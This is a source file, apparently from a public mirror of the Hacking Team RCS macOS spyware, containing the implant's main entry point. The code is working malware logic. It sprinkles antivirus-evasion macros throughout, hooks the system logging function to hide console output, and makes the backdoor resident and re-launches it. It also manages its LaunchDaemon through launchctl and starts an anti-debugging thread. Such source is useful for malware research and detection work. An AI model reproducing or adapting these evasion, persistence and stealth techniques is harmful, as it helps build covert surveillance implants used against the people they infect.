hackedteam/core-macos

View on GitHub
core/RCSMMain.m

Summary

Maintainability
Test Coverage
/*
 * RCSMac
 *
 *
 * Created by Alfredo 'revenge' Pesoli on 23/03/2009
 * Copyright (C) HT srl 2009. All rights reserved
 *
 */

#import <Cocoa/Cocoa.h>

#import "RCSMCommon.h"

#import "RCSMCore.h"
#import "mach_override.h"
#import "RCSMGlobals.h"
#import "RCSMLogger.h"
#import "RCSMDebug.h"
#import "NSMutableData+SHA1.h"

#import "RCSMAVGarbage.h"


extern void lionSendEventToPid(pid_t pid);

#ifndef ENABLE_LOGGING
#include <asl.h>

// Do not log anything in the console
static int _hook_asl_send(aslclient client, aslmsg msg)
{
  return 1;
}
int (*asl_send_reentry)(aslclient,aslmsg);
#endif

int main (int argc, const char *argv[])
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
 
  // AV evasion: only on release build
  AV_GARBAGE_000
  char* _unused_infoPlaceHolder = infoPlaceHolder;
  _unused_infoPlaceHolder++;
  
#ifdef ENABLE_LOGGING
  [__m_MLogger setComponent: @"core"];
//  infoLog(@"STARTING");
#else
  // suppress every logging in console
  mach_override("_asl_send", "libsystem_c",(void *)&_hook_asl_send, (void **)&asl_send_reentry);
#endif
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  // FIXED- fixing string binary patched
  gBackdoorID[14] = gBackdoorID[15] = 0;
  gMode[5] = 0;
  
  // Bogus for compiling
  char *pseudoW = gBackdoorPseduoSign;
  pseudoW = NULL;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  // Fix for lion: AppleEvents only from unhidden proc
  if (argc > 1) 
    {
      if (argv[1] &&
          (strncmp(argv[1], "-p", strlen("-p")) == 0)) 
        {
          NSAutoreleasePool *innerpool = [[NSAutoreleasePool alloc] init];
          
           //AV evasion: only on release build
          AV_GARBAGE_003
          
          pid_t pid = atoi(argv[2]);

          lionSendEventToPid(pid);

          [innerpool release];
          
          [pool release];
          /*
           * AV evasion: only on release build
           */
          AV_GARBAGE_004
          
          exit(0);
        }
    }
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  gUtil = [__m_MUtils sharedInstance];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  NSString *offlineFlagPath = [[NSString alloc] initWithFormat: @"%@/off.flg",
                               [[NSBundle mainBundle] bundlePath]];
  
  __m_MCore *core = [[__m_MCore alloc] init];
  
  //
  // Check if we've been installed by offline cd
  //
  if ([[NSFileManager defaultManager] fileExistsAtPath: offlineFlagPath])
    {
      [[NSFileManager defaultManager] removeItemAtPath: offlineFlagPath
                                                 error: nil];
      
      // AV evasion: only on release build
      AV_GARBAGE_007
      
      // Force it
      [core makeBackdoorResident];
      
      //
      // Executing ourself with the new executable name and exit
      //
      [gUtil executeTask: [[NSBundle mainBundle] executablePath]
           withArguments: nil
            waitUntilEnd: NO];
      
      // AV evasion: only on release build
      AV_GARBAGE_008
      
      //
      // Remove the LaunchDaemon plist
      //
      NSString *backdoorPlist = createLaunchdPlistPath();
 
      // AV evasion: only on release build
      AV_GARBAGE_009
      
      // Unload our service from LaunchDaemon
      NSArray *_commArguments = [[NSArray alloc] initWithObjects:
                                 @"remove",
                                 [[backdoorPlist lastPathComponent]
                                  stringByDeletingPathExtension],
                                 nil];
      
      [gUtil executeTask: @"/bin/launchctl"
           withArguments: _commArguments
            waitUntilEnd: YES];

      // AV evasion: only on release build
      AV_GARBAGE_000
      
      exit(0);
    }
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  [offlineFlagPath release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  // Spawn a thread who checks whenever a debugger is attaching our app/
#ifndef NO_ANTIDEBUGGING
  [NSThread detachNewThreadSelector: @selector(xfrth)
                           toTarget: core
                         withObject: nil];
#endif
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [core runMeh];
  
   // AV evasion: only on release build
  AV_GARBAGE_003
  
  [pool drain];
  
  return 0;
}